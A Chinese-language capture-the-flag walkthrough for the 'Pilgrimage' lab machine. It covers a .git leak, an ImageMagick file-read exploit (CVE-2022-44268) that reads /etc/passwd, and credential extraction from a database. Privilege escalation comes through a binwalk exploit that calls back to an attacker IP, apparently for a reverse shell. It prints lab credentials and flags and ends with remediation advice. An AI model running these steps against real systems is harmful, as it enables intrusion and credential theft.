Pilgrimage靶机渗透测试教学文档

1. 信息收集

1.1 初始扫描

目标IP: 10.10.11.219

开放端口扫描结果：

• 22/tcp - OpenSSH 8.4p1 Debian 5+deb11u1
• 80/tcp - nginx 1.18.0 (重定向到http://pilgrimage.htb/)

$ ip='10.10.11.219'; itf='tun0'
$ echo '10.10.11.219 pilgrimage.htb' >> /etc/hosts

1.2 目录扫描

使用feroxbuster进行目录扫描：

$ feroxbuster -u 'http://pilgrimage.htb'

2. .Git泄露利用

发现.git目录泄露：

$ githack http://pilgrimage.htb/.git

从.git仓库中恢复出源代码，发现网站使用ImageMagick处理图片。

3. ImageMagick LFI漏洞利用(CVE-2022-44268)

3.1 漏洞验证

检查ImageMagick版本：

$ ./magick --version

确认版本为7.1.0，存在CVE-2022-44268漏洞。

3.2 漏洞利用

使用漏洞利用工具：

$ cargo run "/etc/passwd"
$ convert image.png -resize 50% output.png

上传恶意图片后，使用identify命令读取文件内容：

$ identify -verbose 67aadcf584baa.png

获取到用户名：emily

4. 数据库文件提取与解密

从恢复的数据中获取hex编码的数据库文件：

$ python3 -c 'with open("hex", "rb") as f: open("dmp.db", "wb").write(bytes.fromhex(f.read().decode()))'

查询数据库获取凭证：

$ sqlite3 dmp.db
sqlite> select * from users;

获取密码：abigchonkyboi123

5. 用户权限获取

使用获取的凭证登录系统：

• 用户名：emily
• 密码：abigchonkyboi123

获取user.txt内容：
715cf7707976d6d4f99e0b2e5c72f5ba

6. 权限提升(binwalk v2.3.2)

6.1 漏洞验证

检查binwalk版本：

$ /usr/local/bin/binwalk

确认版本为v2.3.2，存在漏洞。

6.2 漏洞利用

使用公开的exploit(51249)：

$ python3 exp.py 67aadcf584baa.png 10.10.16.28 10033

成功获取root权限，读取root.txt：
d1c4c05c4039ed97c27b001ed3c8b8c8

7. 关键漏洞总结

1. .Git泄露：暴露源代码和敏感信息
2. ImageMagick LFI(CVE-2022-44268)：通过恶意图片读取任意文件
3. binwalk v2.3.2权限提升：利用binwalk漏洞获取root权限

8. 修复建议

1. 移除.git目录或配置nginx禁止访问.git
2. 升级ImageMagick到最新版本
3. 升级binwalk或限制其执行权限